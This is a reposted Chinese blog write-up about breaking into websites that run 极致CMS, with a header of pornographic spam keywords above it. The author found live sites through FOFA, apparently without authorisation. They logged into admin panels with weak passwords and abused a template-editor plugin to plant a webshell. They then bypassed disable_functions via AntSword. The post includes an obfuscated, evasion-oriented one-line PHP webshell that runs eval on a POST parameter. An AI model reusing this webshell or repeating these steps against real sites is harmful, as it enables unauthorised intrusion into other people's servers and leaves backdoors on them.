日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

记某CMS漏洞getshell

發布時間:2024/1/23 编程问答 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 记某CMS漏洞getshell 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

記極致CMS漏洞getshell

今天下午比較空閑,就去搜索一些cms,突然對極致CMS感興趣,而網上已經有一些文章對它進行分析利用,sql注入,xss,后臺修改上傳后綴名前臺getshell等等。
于是就引起了我的興趣想去測試一下。

信息收集

還是因為自己太懶,不想搭建環境,然后就想網上有好多網站啊,隨便找一個去看看。hhh然后去利用fofa去搜索。(不能隨便亂日)

弱密碼yyds

搜索了一些網站,我們直接在url后面添加/admin.php,就直接跳到后臺登錄的地方。

看到后臺?!嗯~,測試了sql無果,想一想萬一有弱密碼呢?試一試也沒有啥。

然后就測試了弱密碼,你懂的。

然后成功登錄~仿佛就看到了shell就在我面前了。

因為之前有師傅發過前臺上傳文件getshell了,那我這里就不進行測試了。直接尋找另一個方法getshell。

和平常的框架一樣,登錄后臺之后就需要去測試功能點,然后我們就一個一個的去測試吧~(這里大概過了有40分鐘 2333~)

唯一我感覺利用點就存在系統設置中的高級設置,我們可以選擇上傳的后綴名,不過這里是前臺的上傳啊,后臺雖然有上傳點但是一直繞過不了。難受死了,心里又不甘心在前臺上傳getshell,這豈不是很沒有面子(傲嬌)

這里一直后臺沒有繞過~~~ 2333~

柳暗花明又一村

想一想,如果要利用后臺,那肯定是一些功能的問題,那我們就去認真找一下網站功能,找來找去就發現一個上傳點,有點難受了。過了好久,突然想起了后臺有一個擴展管理啊,應該說肯定可以下載一下插件來更加功能的吧。

然后就憑著感覺和功能去看看那些插件可以利用。發現了一個在線編輯模板的插件。

這里可能是ctfer的自覺吧~因為之前打過的ctf題基本上是可以利用編輯插件進行修改代碼,就可以getshell。話不多說就開始嘗試。先下載了該模塊并進行安裝。

安裝前我們還是看看安裝說明。萬一錯誤了怎么辦!

意思就是我們安裝的時候還需要設置密碼,并且該目錄權限比較高,777就讓我看到了shell的希望

然后就設置密碼登錄密碼。

成功登錄之后就看到了這個頁面我當時直接嗨了起了(np!!!)

進入這個頁面,那豈不是可以修改代碼了,嘿嘿嘿~ 那不是shell唾手可得!

寫shell連蟻劍

測試了該插件的功能,發現只能修改代碼還不能寫文件,嗯~。那也簡單啊,我們先在已存在的php頁面上寫入一句話,然后蟻劍連接,創建文件寫shell,之后在刪除之前修改的代碼。

這里分享一個免殺的小馬

<?php $a = $GLOBALS; $str = '_POST'; eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL); ?>

這里寫入我們的一句話木馬

然后就是蟻劍去連接啦。看到蟻劍存在了一個綠色東西,長嘆一口氣~(不過如此)

連接成功居然不能執行???

心里又難受了一下~~~
然后去看看到底過濾了那些函數。并且php版本是5.6

繞disable_functions(沒成功)

然后直接上蟻劍的插件,然后發現是5.6 并且是windows 嗚嗚嗚 不會 直接告辭~

雖然沒有成功執行命令,但也是一個getshell的思路。

啊~煩~。但是滲透人怎么能認輸~

俗話說得好,拿不下就換一個(需要表哥們可以給一些意見學習一下~)

進行收集信息

進行重復上面的操作又獲得一個網站。并且還是通過弱口令獲得~

弱口令yyds

getshell執行命令

這里的步驟和前面一樣,因為有前面的步驟,而這個shell就簡單多了。

也成功獲得蟻劍連接。

并且還是不能執行命令,但是看到了linux系統就想,肯定比windows好多了啊。

于是就開始繞disable_functions,系統信息是這樣的,那直接蟻劍一把梭。

成功繞過,這不就成功了!!!

爽歪歪~

總結

  • 極致CMS還是存在很多漏洞的。這里小弟只是拋磚引玉而已。

  • 而寫到這里的時候已經是晚上了,提權的話還是后面文章在說吧。

  • 簡單的說一下就是該漏洞是主要存在于cms后臺插件的位置,允許用戶修改代碼,而這沒有過濾就造成了巨大的風險。

總結

以上是生活随笔為你收集整理的记某CMS漏洞getshell的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。